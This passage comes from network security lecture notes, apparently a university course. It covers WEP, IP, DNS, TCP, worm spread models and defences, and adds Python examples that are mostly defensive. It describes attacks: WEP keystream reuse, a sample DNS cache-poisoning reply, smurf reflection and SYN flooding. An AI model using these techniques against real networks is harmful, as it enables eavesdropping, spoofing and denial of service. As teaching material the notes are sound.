- Uses much stronger cryptography (AES)
- EAP (Extensible Authentication Protocol): negotiates an authentication mechanism
- We will talk about such cryptographic protocols in much more detail in a few weeks
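The WEP keystream and IV material above, as an added example (not course code): a textbook RC4 keystream generator, the $C_1 \oplus C_2 = P_1 \oplus P_2$ relation when two frames share an IV under one shared key, a monitor that flags IV reuse since IVs travel in the clear, and the two figures from the slides (time to exhaust the IV space at 1000 packets/s, and the birthday bound of about 4823 random IVs). The shared key, IV values and frame contents are constructed; the ICV trailer is left out.

```python
"""WEP's IV weakness from the slides above, as an added example (not course
code): a textbook RC4 keystream generator, the C1 xor C2 = P1 xor P2
relation when two frames reuse an IV under the same shared key, a monitor
that flags IV reuse, and the two numbers from the slides: time to exhaust
the 24-bit IV space at 1000 packets/s and the birthday bound of about 4823
random IVs.  Key, IVs and frame contents are constructed; no ICV."""

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then pseudo-random generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                         # KSA
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                      # PRGA
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_encrypt(key: bytes, data: bytes) -> bytes:
    return xor(data, rc4_keystream(key, len(data)))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || S; the ICV trailer is left out here."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be 24 bits")
    return rc4_encrypt(iv + shared_key, plaintext)


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """With a shared IV the keystreams cancel: C1 xor C2 = P1 xor P2."""
    return xor(c1, c2)


def first_iv_reuse(ivs) -> int:
    """Index of the first frame whose (cleartext) IV was already seen, or -1.
    This is the detection the slides mention: IVs are public, so a passive
    monitor can flag reuse without the key."""
    seen = set()
    for idx, iv in enumerate(ivs):
        if iv in seen:
            return idx
        seen.add(iv)
    return -1


def hours_to_exhaust_ivs(packets_per_second: float) -> float:
    return IV_SPACE / packets_per_second / 3600.0


def collision_probability(n_packets: int) -> float:
    """P(at least one repeated IV among n uniformly random 24-bit IVs),
    computed as the exact birthday product rather than the approximation."""
    p_none = 1.0
    for k in range(n_packets):
        p_none *= 1.0 - k / IV_SPACE
    return 1.0 - p_none


if __name__ == "__main__":
    key = b"\x0b\xad\xc0\xff\xee"               # constructed 40-bit WEP key
    iv = b"\x00\x00\x07"                        # incrementing-IV vendor, after a reset
    p1 = b"GET /index.html HTTP/1.0"            # constructed frame payloads
    p2 = b"GET /admin.html HTTP/1.0"
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print(keystream_reuse_leak(c1, c2) == xor(p1, p2))
    print(first_iv_reuse([b"\x00\x00\x05", b"\x00\x00\x06", iv, b"\x00\x00\x08", iv]))
    print(f"{hours_to_exhaust_ivs(1000):.1f} h to cycle all IVs at 1000 pkt/s")
    print(f"P(collision) after 4823 random IVs = {collision_probability(4823):.4f}")
```

The exact product puts the 50% crossing at 4824 packets; the slide's 4823 is the usual $\sqrt{2 \cdot 2^{24} \ln 2}$ approximation rounded.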
Internet Protocol
- Interoperability
  - Overlays running at hosts
  - Virtual Network Infrastructure runs globally
  - Networks run locally

Internetworks
[Figure: networks joined by routers (gateways)]
[Figure: Ethernet, Ethernet, point-to-point link (e.g., ISDN), FDDI, Token Ring]

IP Encapsulation
- Example of the protocol layers used to transmit from H1 to H8 in the network shown on the previous slide
[Figure: H1 (TCP, IP, ETH) to R1 (ETH, FDDI) to R2 (FDDI, PPP) to R3 (PPP, ETH) to H8 (TCP, IP, ETH)]

IP Service Model
- Choose a minimal service model that all nets can implement ("tin cans and a string" extremum)
- Features
  - Best-effort datagram delivery
  - Reliability etc. as overlays (as in TCP/IP)
  - Packet format standardized

IPv4 Packet Format
[Figure: IPv4 header with bit positions 0, 4, 8, 16, 19, 31; fields shown include Length, Offset, Protocol, Checksum, SourceAddr, DestinationAddr, Options (variable length)]

Fields of the IPv4 Header
- Version: version of IP (the example header is IPv4); first field, so easy to implement as a case statement
- HLen: header length in 32-bit words
- TOS: Type of Service (rarely used); priorities: delay, throughput, reliability
- Length: length of the datagram in bytes; 16 bits, hence a max of 65,536 bytes
- Fields for fragmentation and reassembly: Identifier, Flags, Offset

Header fields (continued)
- TTL: Time to live (in reality, a hop count); 64 is the current default, 128 also used
- Protocol: e.g., TCP = 6, UDP = 17, etc.
- Checksum: checksum of the header (not a CRC); if the header fails the checksum, discard the whole packet
- SourceAddr, DestinationAddr: 32-bit IP addresses, global, IP-defined
- Options: length can be computed using HLen

IP Datagram Delivery
- Every IP packet (datagram) contains the destination IP address
- The network part of the address uniquely identifies a single network that is part of the larger Internet
- All hosts and routers that share the same network part of their address are connected to the same physical network
- Routers can exchange packets on any network they're attached to

IP addresses
- Hierarchical (not flat, as in Ethernet)
[Figure: address formats. Class A: leading bit 0, 7-bit Network, 24-bit Host]
Network Classes
  Class | # of networks        | # of hosts per net
  A     | 126                  | 16 million
  B     | 16,384 (14 net bits) | 65,534
  C     | 2 million            | 254

IP Forwarding Algorithm
  if Network(dest) == Network(interface) then
      deliver to destination over that interface
  else if Network(dest) is in the forwarding table then
      deliver packet to the NextHop router
  else
      deliver packet to the default router
  - Forwarding tables contain (Network, NextHop) pairs plus additional information.
  - They are built by a routing protocol that learns the network topology and adapts to changes.

Subnetting
  - Problem: the IP addressing scheme leads to fragmentation. A class B network with only 300 machines on it wastes more than 65,000 addresses.
  - Need a way to divide a single network address space into multiple smaller subnetworks.
  - Idea: one IP network number is allocated to several physical networks. The multiple physical networks are called subnets.
  - The subnets should be close together (why?). Useful when a large company or university has many physical networks.

Subnet Numbers
  - Solution: subnetting. All nodes are configured with a subnet mask, which allows definition of a subnet number.
  - All hosts on a physical subnetwork share the same subnet number.
  - Subnet mask 255.255.255.0 = 11111111 11111111 11111111 00000000
  - Subnetted address = Network number | Subnet ID | Host ID

Example of Subnetting (addresses from the figure)
  Subnet mask 255.255.255.128, subnet number 128.96.34.0:    hosts/interfaces 128.96.34.1, 128.96.34.15
  Subnet mask 255.255.255.128, subnet number 128.96.34.128:  hosts/interfaces 128.96.34.129, 128.96.34.130, 128.96.34.139
  Subnet mask 255.255.255.0,   subnet number 128.96.33.0:    hosts/interfaces 128.96.33.1, 128.96.33.14

Subnets (continued)
  - The mask is bitwise-ANDed with the address; this is done at routers.
  - Router tables in this model hold <SubnetNumber, SubnetMask, NextHop>.
  - Subnetting allows a set of physical networks to look like a single logical network from elsewhere.

Forwarding Algorithm
  D = destination IP address
  for each forwarding table entry (SubnetNumber,
                                   SubnetMask, NextHop):
      D1 = SubnetMask & D
      if D1 == SubnetNumber:
          if NextHop is an interface:
              deliver datagram directly to destination
          else:
              deliver datagram to NextHop router
  deliver datagram to the default router if the above fails

ARP (Address Resolution Protocol)
  - Problem: need a mapping between IP and link-layer addresses.
  - Solution: ARP. Every host maintains an IP -> link-layer mapping table (a cache); cached entries time out after about 15 minutes.
  - The sender broadcasts "Who is IP address X?"; the broadcast includes the sender's own IP and link-layer address.
  - Receivers: any host that already has the sender in its cache refreshes the timeout; the host with IP address X replies "IP X is link-layer Y"; the target host adds the sender to its cache if it is not already there.

ICMP (Internet Control Message Protocol)
  - A collection of error and control messages, sent back to the source when a router or host cannot process a packet correctly.
  - Error examples: destination host unreachable; reassembly process failed; TTL reached 0; IP header checksum failed.
  - Control example: Redirect, which tells the source about a better route.

Domain Name System
  - System for mapping mnemonic names for computers into IP addresses, e.g. zeta.cis.upenn.edu -> 158.130.12.244.
  - Domain hierarchy; name servers.
  - 13 root servers map top-level domains such as "com" or "net". Why 13? The early UDP protocol supported only 512 bytes per response.
  - Name resolution: the protocol for looking up hierarchical domain names to determine the IP address. It runs on UDP port 53.

Domain Name Hierarchy (tree figure)
  - Top-level domains such as edu, com, net, mil, gov, org, arpa.
  - Second level, e.g. cornell.edu, upenn.edu, cisco.com, yahoo.com, nasa.gov, nsf.gov, navy.mil.
  - Under upenn.edu: cis, seas, wharton.

Hierarchy of Name Servers (figure)
  - Root name server -> Cornell name server, Upenn name server -> CIS, SEAS and Wharton name servers.

Records on Name Servers
  - < Name, Type, Class, TTL, RDLength, RDATA >
  - Name: name of the node.
  - Types: A (host-to-address mappings), NS (name server address mappings), CNAME (aliases), MX (mail exchange server mappings), others.
  - Class: IN for IP addresses.
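The subnetting example and the forwarding algorithm above, run as code. This is an added example, not from the lecture: the forwarding table (interfaces if0/if1 and the router address 128.96.34.129 for the 128.96.33.0 subnet) is an assumption consistent with the slide's addresses. The last function shows that the same mask-and-compare lookup gives a router what it needs for the address-spoofing check the firewall lectures later call ingress/egress filtering.

```python
# Added example, not from the lecture slides: the slide's forwarding algorithm
# over the subnetting example, plus the spoofing check a router can derive
# from the same lookup. Table entries and interface names are assumptions.
import ipaddress   # standard library; only used to turn dotted quads into ints


def to_int(addr: str) -> int:
    return int(ipaddress.IPv4Address(addr))


def subnet_number(addr: str, mask: str) -> str:
    """The slide's 'mask bitwise-ANDed with address'."""
    return str(ipaddress.IPv4Address(to_int(addr) & to_int(mask)))


def forward(dest: str, table, default: str = "default router") -> str:
    """Entries are (SubnetNumber, SubnetMask, NextHop); NextHop is either an
    interface name ("ifN", deliver directly) or a router address.
    The most specific matching entry (longest mask) wins, which is what a
    real router does when subnets overlap."""
    d = to_int(dest)
    best = None
    for subnet, mask, nexthop in table:
        m = to_int(mask)
        if d & m == to_int(subnet):                   # D1 = SubnetMask & D
            if best is None or m > best[0]:
                best = (m, nexthop)
    if best is None:
        return default
    nexthop = best[1]
    if nexthop.startswith("if"):
        return "deliver directly via " + nexthop
    return "forward to router " + nexthop


# Assumed table for the router that sits on both /25 subnets and reaches
# 128.96.33.0/24 through the second router's interface 128.96.34.129.
R1_TABLE = [
    ("128.96.34.0",   "255.255.255.128", "if0"),
    ("128.96.34.128", "255.255.255.128", "if1"),
    ("128.96.33.0",   "255.255.255.0",   "128.96.34.129"),
]


def plausible_source(src: str, arrival_iface: str, table) -> bool:
    """Anti-spoofing check: a packet arriving on `arrival_iface` should carry a
    source address that the table says is directly reachable via that same
    interface; otherwise the source address is forged or misrouted."""
    return forward(src, table) == "deliver directly via " + arrival_iface


if __name__ == "__main__":
    for host in ("128.96.34.15", "128.96.34.139", "128.96.33.14", "158.130.14.2"):
        print(host, "->", forward(host, R1_TABLE))
    print("128.96.34.139 claimed on if0 is plausible:",
          plausible_source("128.96.34.139", "if0", R1_TABLE))
```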
Name Resolution (figure; only the message flow is recoverable)
  - The local name server resolves www.upenn.edu by querying the root name server (198.41.0.4), then the edu name server (204.74.112.1), then the upenn name server (207.142.131.234), and returns the answer to the client.

DNS Vulnerabilities
  - See "Corrupted DNS Resolution Paths: The Rise of a Malicious Resolution Authority" by Dagon et al.
  - Rogue DNS servers: compromised DNS servers that answer incorrectly.
  - DNS cache poisoning:
      Request:  subdomain.example.com  IN  A
      Reply:    Answer section:      (no response)
                Authority section:   example.com  3600  IN  NS  ns.wikipedia.org
                Additional section:  ns.wikipedia.org  IN  A  w.x.y.z
    A resolver that caches the "additional" record now holds the attacker's address for a name outside the zone it asked about.

Reflected Denial of Service
  - An ICMP message with an "echo request" is called 'ping'.
  - Broadcast a ping request, and for the sender's address put the target's address: all hosts reply to the ping, flooding the target with responses.
  - Hard to trace. Hard to prevent: turning off ping makes legitimate use impossible; limit it with network configuration by restricting the scope of broadcast messages.
  - Sometimes called a "smurf attack".

Distributed Denial of Service
  - Coordinate multiple subverted machines to attack; flood a server with bogus requests. TCP SYN packet flood: > 600,000 packets per second.
  - Detection and assessment: 12,800 attacks at 5,000 hosts in a 3-week period during 2001; IP spoofing (forged source IP address). http://www.cs.ucsd.edu/users/savage/papers/UsenixSec01.pdf
  - Feb 6, 2007: 6 of 13 root servers suffered a DDoS attack. Oct 21, 2002: 9 of 13 root servers were swamped; this prompted changes in the architecture.
  - Prevention: filtering; decentralized file storage.

CIS 551 / TCOM 401, Computer and Network Security, Spring 2009, Lecture 5 (1/29/09)

Announcements
  - First project due 6 Feb 2009 at 11:59 pm: http://www.cis.upenn.edu/~cis551/project1.html
  - Group project, 2 or 3 students per group. Send email to cis551@seas.upenn.edu with your group.
  - Plan for today: worms and viruses (continued); start of network security.

Worm Research Sources
  - "Inside the Slammer Worm", Moore, Paxson, Savage, Shannon, Staniford and Weaver
  - "How to 0wn the Internet in Your Spare Time", Staniford, Paxson and Weaver
  - "The Top Speed of Flash Worms", Staniford, Moore, Paxson and Weaver
  - "Internet Quarantine: Requirements for Containing Self-Propagating Code", Moore, Shannon, Voelker and Savage
  - "Automated Worm Fingerprinting", Singh, Estan, Varghese and Savage
  - Links on the course web pages.
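A resolver-side check against the cache-poisoning reply shown on the DNS vulnerabilities slide above: the "bailiwick" rule, under which a server's answer may only install records for names inside the zone that server is responsible for. This is an added example, not from the lecture or from Dagon et al.; the record tuples and the two replies are constructed, and the rule is simplified (real resolvers also rank cached data by the trustworthiness of its source).

```python
# Added example, not from the lecture slides or from Dagon et al.: a resolver
# that caches only in-bailiwick records, which neutralizes the 'additional
# section' trick in the poisoning reply on the slide. Simplified: real
# resolvers also rank records by source trustworthiness.


def in_bailiwick(name: str, zone: str) -> bool:
    """True if `name` equals `zone` or lies below it (case-insensitive)."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def cacheable_records(query_name: str, answering_zone: str, reply: dict) -> list:
    """`reply` has 'answer', 'authority' and 'additional' lists of
    (owner, ttl, type, rdata). `answering_zone` is the zone the resolver was
    asking this server about. Rules applied:
      - answer/authority records must be inside that zone, and an NS record
        must actually cover the name that was queried;
      - an additional A record is accepted only as glue for an accepted NS
        record AND only if the name server itself is inside the zone.
    The attacker's 'ns.wikipedia.org IN A w.x.y.z' fails the last test."""
    kept, delegated = [], set()
    for owner, ttl, rtype, rdata in reply.get("answer", []):
        if in_bailiwick(owner, answering_zone):
            kept.append((owner, ttl, rtype, rdata))
    for owner, ttl, rtype, rdata in reply.get("authority", []):
        if (rtype == "NS" and in_bailiwick(owner, answering_zone)
                and in_bailiwick(query_name, owner)):
            kept.append((owner, ttl, rtype, rdata))
            delegated.add(rdata.lower().rstrip("."))
    for owner, ttl, rtype, rdata in reply.get("additional", []):
        host = owner.lower().rstrip(".")
        if rtype == "A" and host in delegated and in_bailiwick(host, answering_zone):
            kept.append((owner, ttl, rtype, rdata))
    return kept


# Constructed: the poisoning attempt from the slide, returned to a resolver
# that asked about subdomain.example.com. 203.0.113.9 stands in for w.x.y.z.
POISON_REPLY = {
    "answer": [],
    "authority": [("example.com", 3600, "NS", "ns.wikipedia.org")],
    "additional": [("ns.wikipedia.org", 3600, "A", "203.0.113.9")],
}

# Constructed: a legitimate delegation with in-zone glue, for comparison.
GOOD_REPLY = {
    "answer": [],
    "authority": [("example.com", 3600, "NS", "ns1.example.com")],
    "additional": [("ns1.example.com", 3600, "A", "192.0.2.53")],
}

if __name__ == "__main__":
    print("poison:", cacheable_records("subdomain.example.com", "example.com", POISON_REPLY))
    print("good:  ", cacheable_records("subdomain.example.com", "example.com", GOOD_REPLY))
```

The NS record naming ns.wikipedia.org is still cached, but without the forged glue the resolver must look that host up through the org tree, so the attacker gains no control over wikipedia.org addresses.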
Analysis: Random Constant Spread Model
  - IP address space: $2^{32}$.
  - $N$: size of the total vulnerable population.
  - $S(t)$: susceptible (non-infected) hosts at time $t$; $I(t)$: infective (infected) hosts at time $t$.
  - $\beta$: contact likelihood (contact rate).
  - $s(t) = S(t)/N$: proportion of the population that is susceptible; $i(t) = I(t)/N$: proportion that is infected.
  - Note $S(t) + I(t) = N$.

Infection Rate Over Time
  - The change in the infected proportion is (number of infected hosts) x (rate of contact) x (likelihood that a contacted host is susceptible):
      $\frac{di}{dt} = \beta\, i\,(1 - i)$
  - Rewrite as $\frac{di}{i(1-i)} = \beta\, dt$ and integrate to get the closed form
      $i(t) = \frac{e^{\beta(t - T)}}{1 + e^{\beta(t - T)}}$, with $T$ the integration constant.

Exponential Growth Tapers Off
  - (Figure: example curve of $I(t)$ for $N = 3.5 \times 10^5$, with infected hosts from 0 to $3.5 \times 10^5$ on the y-axis and $t$ from 0 to 600 seconds on the x-axis.) $\beta$ affects the steepness of the slope.

What Can Be Done?
  - Reduce the number of infected hosts: treatment, i.e. reduce $I(t)$ while it is still small (e.g. shut down / repair infected hosts). Reactive.
  - Reduce the contact rate: containment, i.e. reduce $\beta$ while $I(t)$ is still small (e.g. filter traffic). Reactive.
  - Reduce the number of susceptible hosts: prevention, i.e. reduce $S(0)$ (e.g. use type-safe languages). Proactive.

Treatment: Reduce the Number of Infected Hosts
  - Disinfect infected hosts.
  - Detect infection in real time.
  - Develop a specialized vaccine in real time.
  - Distribute the patch more quickly than the worm can spread: anti-worm (CRClean); bandwidth interference.

Effects of Patching Infected Hosts: Kermack-McKendrick Model
  - State transition: susceptible -> infectious -> removed.
  - $u(t)$: proportion removed from the infectious population; $\gamma$: removal rate.
      $\frac{di}{dt} = \beta\, i\,(1 - i - u) - \frac{du}{dt}$,    $\frac{du}{dt} = \gamma\, i$
  - (Figure: plot of $I(t)$ under this model.)

Containment: Reduce the Contact Rate $\beta$
  - Oblivious defense: consume limited worm resources; throttle traffic to slow spread.
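The random constant spread model above, integrated numerically and checked against its closed form, then extended with the Kermack-McKendrick removal term and with a containment step that drops the contact rate at a reaction time (the "reduce $\beta$ while $I(t)$ is small" idea, which is also the parameter the reactive-defense analysis on the following slides varies). This is an added example, not from the lecture or the worm papers; $\beta$, the initial infected fraction and the reaction time are illustrative values, not measurements.

```python
# Added example, not from the lecture slides or the worm papers: the random
# constant spread (RCS) model integrated numerically, checked against its
# closed form, then extended with Kermack-McKendrick removal and with a
# containment step. All parameter values are illustrative, not measurements.
import math


def rcs_closed_form(t: float, beta: float, T: float) -> float:
    """i(t) = e^(beta (t - T)) / (1 + e^(beta (t - T)))."""
    x = math.exp(beta * (t - T))
    return x / (1.0 + x)


def t_half(beta: float, i0: float) -> float:
    """The integration constant T for which i(0) == i0; it is also the time
    at which half the vulnerable population is infected."""
    return -math.log(i0 / (1.0 - i0)) / beta


def simulate(beta: float, i0: float, t_end: float, dt: float = 1.0,
             gamma: float = 0.0, react_at: float = None, beta_after: float = None):
    """Forward-Euler integration of
        di/dt = beta * i * (1 - i - u) - du/dt,      du/dt = gamma * i
    which is the RCS model when gamma == 0 (so u stays 0). If react_at is
    given, the contact rate becomes beta_after from that time on: this is
    containment (e.g. content filtering) with reaction time react_at.
    Returns a list of (t, i, u) samples."""
    i, u, t = i0, 0.0, 0.0
    out = [(t, i, u)]
    while t < t_end:
        b = beta_after if (react_at is not None and t >= react_at) else beta
        du = gamma * i
        di = b * i * (1.0 - i - u) - du
        i, u, t = i + di * dt, u + du * dt, t + dt
        out.append((t, i, u))
    return out


def simulated_at(samples, t: float) -> float:
    """Infected fraction at the sample closest to time t."""
    return min(samples, key=lambda s: abs(s[0] - t))[1]


def final_infected_fraction(**kw) -> float:
    return simulate(**kw)[-1][1]


def peak_infected_fraction(**kw) -> float:
    return max(i for _, i, _ in simulate(**kw))


if __name__ == "__main__":
    # Illustrative: one infected host among 3.5e5 vulnerable ones (the
    # population on the slide) and beta = 0.0005 contacts per second.
    beta, i0, day = 0.0005, 1 / 350000.0, 24 * 3600
    T = t_half(beta, i0)
    samples = simulate(beta=beta, i0=i0, t_end=12 * 3600, dt=60)
    for t, i, _ in samples[::120]:
        print("%6d s  simulated %.4f  closed form %.4f" % (t, i, rcs_closed_form(t, beta, T)))
    print("peak, no defence          :", peak_infected_fraction(beta=beta, i0=i0, t_end=day, dt=60))
    print("peak, removal gamma=beta/2:", peak_infected_fraction(beta=beta, i0=i0, t_end=day, dt=60, gamma=beta / 2))
    print("final, contain after 2 h  :", final_infected_fraction(beta=beta, i0=i0, t_end=day, dt=60,
                                                               react_at=7200, beta_after=0.0))
```

Two things fall out of running it: with removal rate $\gamma \ge \beta$ the epidemic never takes off at all (the classic threshold), and containment only helps if the reaction time is well below $T$, the time to the midpoint of the logistic curve.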
  - Possibly an important capability, but the worm still spreads.
  - Targeted defense: detect and block the worm.

Design Space
  - Design issues for reactive defense (Moore et al. '03). Any reactive defense is defined by:
  - Reaction time: how long to detect, propagate information, and activate the response.
  - Containment strategy: how malicious behavior is identified and stopped.
  - Deployment scenario: who participates in the system.
  - Savage et al. evaluate the requirements on these parameters for building any effective system against worm propagation.

Methodology (Moore et al., "Internet Quarantine" paper)
  - Simulate the spread of a worm across the Internet topology: infected hosts attempt to spread at a fixed rate (probes/sec); target selection is uniformly random over the IPv4 space.
  - Simulation of the defense system: it detects infection within the reaction time, and a subset of network nodes employ a containment strategy.
  - Evaluation metric: % of vulnerable hosts infected in 24 hours. 100 runs of each set of parameters, with the 95th percentile taken (systems must plan for reasonable situations, not the average case).
  - Source data: vulnerable hosts = 359,000 IP addresses of CodeRed v2 victims; Internet topology = AS routing topology derived from RouteViews.

Initial Approach: Universal Deployment
  - Assume every host employs the containment strategy. Two containment strategies were tested:
  - Address blacklisting: block traffic from malicious source IP addresses; reaction time is relative to each infected host.
  - Content filtering: block traffic based on a signature of the content; reaction time is from the first infection.
  - How quickly does each strategy need to react? How sensitive is reaction time to the worm probe rate?

Reaction Times
  - (Figure: % of vulnerable hosts infected after 24 hours against reaction time, in minutes for address blacklisting and in hours for content filtering.)
  - To contain worms to 10% of vulnerable hosts after 24 hours of spreading at 10 probes/sec (CodeRed): address blacklisting reaction
    time must be less than 25 minutes; content filtering reaction time must be less than 3 hours.

Probe Rate vs. Reaction Time
  - (Figure: required reaction time against probes/second for content filtering, on log axes.)
  - Reaction times must be fast when probe rates get high: at 10 probes/sec the reaction time must be under hours; at 1000 probes/sec it must be under 2 minutes.

Limited Network Deployment
  - Depending on every host to implement containment is not feasible (installation and administration costs, system communication overhead).
  - A more realistic scenario is limited deployment in the network:
      Customer network: firewall-like inbound filtering of traffic.
      ISP network: filter traffic passing through the border routers of large transit ISPs.
  - How effective are the deployment scenarios? How sensitive is reaction time to worm probe rate under limited network deployment?

Deployment Scenario Effectiveness
  - (Figure: reaction time 2 hours, CodeRed-like worm; % infected against the number of participating customer networks and against the number of participating ISPs.)
  - Content-filtering firewalls at the edge of customer nets vs. content filtering at exchange points in major ISPs.

Reaction Time vs. Probe Rate II (top 100 ISPs filter)
  - (Figure: required reaction time, from 8 hours down to 1 second, against probes/second.)
  - Above 60 probes/sec, containment to 10% of hosts within 24 hours is impossible even with instantaneous reaction.

Summary: Reactive Defense
  - Reaction time: the required reaction times are a couple of minutes or less, and far less for bandwidth-limited scanners.
  - Containment strategy: content filtering is more effective than address blacklisting.
  - Deployment scenarios: customer-network deployment needs nearly all customer networks to provide containment; ISP deployment needs at least the top 40 ISPs to provide containment.

Mechanisms to Mitigate Malware
  - Network-level defenses: firewalls, intrusion detection systems, content filtering (the subject of the next several lectures on networks and network security).
  - OS-level defenses: access
    controls and authorization.
  - Software-level defenses: type-safe languages, program verification, software certification.

Network Architecture
  - General blueprints that guide the design and implementation of networks.
  - Goal: deal with the complex requirements of a network. Use abstraction to separate concerns: identify the useful service, specify the interface, hide the implementation.

Layering
  - A result of abstraction in network design: a stack of services (layers), with the hardware service at the bottom layer. Higher-level services are implemented using the services at lower levels.
  - Advantages: decompose problems; modular changes.
  - (Figure: a layered stack, e.g. Application above Error Control above the hardware.)

Protocols
  - A protocol is a specification of an interface between modules, often on different machines.
  - Sometimes "protocol" is used to mean the implementation of the specification.

Example Protocol Stack
  Application programs
  Request/Reply channel | Message stream channel
  Host-to-host connectivity
  Hardware

Protocol Interfaces
  - Service interfaces: communicate up and down the stack.
  - Peer interfaces: communicate with the counterpart on another host.
  - (Figure: a high-level object uses the service interface of the protocol on Host 1, which talks over the peer-to-peer interface to the same protocol on Host 2.)

CIS 551 / TCOM 401, Computer and Network Security, Spring 2010, Lecture 8 (2/25/10)

Protocol Stack Revisited
  - Application, Presentation, Session; UDP and TCP/IP. (The figure marks the layers covered so far.)

Applications vs. Networks
  Application requirements                        | Network characteristics
  Reliable, ordered, single-copy message delivery | Drops, duplicates and reorders messages
  Arbitrarily large messages                      | Finite message size
  Flow control by receiver                        | Arbitrary delay
  Supports multiple applications per host         |

User Datagram Protocol (UDP)
  Header: SrcPort | DestPort | Length | Checksum, followed by the data (carried inside an IP packet).
  - Minimalist transport-layer protocol: exposes the IP packet functionality to the application level.
  - Ports identify the sending/receiving process.
  - Demultiplexing information: the (port, host) pair identifies a network process.

UDP End-to-End Model
  - Multiplexing/demultiplexing with the port number.

Using Ports
  - A client contacts a server at a well-known port: SMTP port 25, DNS port 53, POP3 port 110, Unix talk port 517. In Unix, ports are listed in /etc/services.
  - Sometimes client and server agree on a different port for subsequent communication.
  - Ports are an abstraction, implemented differently on different OSs; typically a message queue.

Transmission Control Protocol (TCP)
  - The most widely used protocol for reliable byte streams: reliable, in-order delivery of a stream of bytes.
  - Full duplex: a pair of streams, one in each direction.
  - Flow and congestion control mechanisms.
  - Like UDP, supports ports. Built on top of IP, hence the "TCP/IP" designation.

TCP End-to-End Model
  - Buffering trades delays for losses/errors.

Packet Format (bit offsets 0, 15, 31)
  SrcPort | DstPort
  SequenceNum
  Acknowledgment
  HdrLen | 0 | Flags | AdvertisedWindow
  Checksum | UrgPtr
  Options (variable)
  Data
  Flags: SYN, FIN, RESET, PUSH, URG, ACK.

Three-Way Handshake
  Active participant (client)                  Passive participant (server)
    SYN, SequenceNum = x             ------>
                                     <------   SYN + ACK, SequenceNum = y, Acknowledgment = x + 1
    ACK, Acknowledgment = y + 1      ------>

TCP State Transitions (figure)
  CLOSED -> SYN_SENT (active open: send SYN);  CLOSED -> LISTEN (passive open)
  LISTEN -> SYN_RCVD (SYN received: send SYN+ACK);  SYN_SENT -> ESTABLISHED (SYN+ACK received: send ACK)
  SYN_RCVD -> ESTABLISHED (ACK received)
  ESTABLISHED -> FIN_WAIT_1 (close: send FIN);  ESTABLISHED -> CLOSE_WAIT (FIN received: send ACK)
  FIN_WAIT_1 -> FIN_WAIT_2 (ACK);  FIN_WAIT_1 -> CLOSING (FIN: send ACK);  FIN_WAIT_2 -> TIME_WAIT (FIN: send ACK);  CLOSING -> TIME_WAIT (ACK)
  CLOSE_WAIT -> LAST_ACK (close: send FIN);  LAST_ACK -> CLOSED (ACK)
  TIME_WAIT -> CLOSED (timeout after two segment lifetimes)

TCP Receiver
  - Maintains a buffer from which the application reads.
  - Advertises (at most) the free buffer size as the window for the sliding window.
  - Responds with Acknowledgment and AdvertisedWindow on each send; updates byte counts when data is OK.
  - The application is blocked until a read is OK.

TCP Sender
  - Maintains a buffer; the sending application is blocked until there is room in the buffer for its write.
  - Holds data until the receiver acknowledges it as successfully received.
  - Implements window expansion
    and contraction (note the difference between flow and congestion control).

TCP Flow and Congestion Control
  - Flow control protects the recipient from being overwhelmed; congestion control protects the network from being overwhelmed.
  - TCP congestion control: additive increase / multiplicative decrease; slow start; fast retransmit and fast recovery.

Increase and Decrease
  - A value CongestionWindow controls the number of unacknowledged transmissions.
  - This value is increased linearly until timeouts for ACKs are missed.
  - When timeouts occur, CongestionWindow is halved to reduce the pressure on the network quickly.
  - The strategy is called additive increase, multiplicative decrease.
  - (Figures: additive increase; the TCP "sawtooth" of window size in KB against time.)

Slow Start
  - Sending the entire window immediately could cause a traffic jam in the network.
  - Begin slowly by setting the congestion window to one packet; when acknowledgements arrive, double the congestion window.
  - Continue until ACKs do not arrive or flow control dominates.

Network Vulnerabilities
  - Anonymity: the attacker is remote, and the origin can be disguised.
  - Authentication: many points of attack; the attacker only needs to find the weakest link, and can mount attacks from many machines.
  - Sharing: many, many users sharing resources.
  - Complexity: distributed systems are large and heterogeneous; unknown perimeter; unknown attack paths.

SYN Flood Attack
  - Recall TCP's 3-way handshake: SYN, SYN+ACK, ACK.
  - The receiver must maintain a queue of partially open TCP connections (SYN_RECV connections): a finite resource, often small (e.g. 20 entries), with timeouts for queue entries of about 1 minute.
  - Attacker: floods a machine with SYN requests, never ACKs them, and spoofs the sending address.
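The SYN-RECV queue described above as a small model, with the numbers the slide gives (about 20 entries, about 1 minute timeout), to see how low a spoofed-SYN rate is enough; beside it, a stateless server that keeps no half-open state by encoding the handshake in its initial sequence number (SYN cookies, a standard mitigation the slide does not mention). This is an added example, not from the lecture; the addresses, the HMAC key and the traffic are constructed.

```python
# Added example, not from the lecture slides: a model of the SYN-RECV queue
# with the slide's numbers (about 20 entries, about 1 minute timeout), and a
# stateless alternative (SYN cookies, a standard mitigation the slide does not
# cover). Addresses, the HMAC key and all traffic below are constructed.
import hashlib
import hmac
import struct


class HalfOpenQueue:
    """Server-side queue of partially opened connections."""

    def __init__(self, size: int = 20, timeout: float = 60.0):
        self.size, self.timeout = size, timeout
        self.entries = {}            # (src_ip, src_port) -> arrival time of the SYN

    def on_syn(self, now: float, src_ip: str, src_port: int) -> bool:
        """True if the SYN got a slot (a SYN+ACK would go out)."""
        self.entries = {k: t for k, t in self.entries.items() if now - t < self.timeout}
        if len(self.entries) >= self.size:
            return False             # queue full: the SYN is dropped on the floor
        self.entries[(src_ip, src_port)] = now
        return True


def syn_flood_blocks_client(rate_per_sec: float, size: int = 20,
                            timeout: float = 60.0, client_at: float = 120.5) -> bool:
    """Attacker sends spoofed SYNs (never ACKed) at rate_per_sec from t = 0.
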